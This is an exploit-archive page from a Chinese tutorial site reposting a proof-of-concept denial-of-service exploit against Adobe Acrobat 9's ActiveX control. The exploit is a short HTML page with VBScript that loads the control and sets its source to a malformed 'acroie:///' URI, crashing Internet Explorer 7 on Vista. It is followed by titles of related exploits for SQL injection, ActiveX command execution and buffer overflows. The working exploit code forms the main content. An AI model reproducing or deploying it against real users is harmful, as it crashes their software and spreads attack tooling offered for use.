手机
当前位置:查字典教程网 >网络安全 >Exploit >Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
摘要:arg1="acroie:///DoS"target.src=arg1

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)

Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista

I can't seem to reproduce this on XP! Oh well.

Of course the most popular app for reading pdfs is SfS/SfI :)

Basically it will crash with any uri that adobe doesn't like.

Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>

<script language=vbscript> arg1="acroie:///DoS"

target.src = arg1 </script>

</body></html>

【Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit】相关文章:

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

精品推荐
分类导航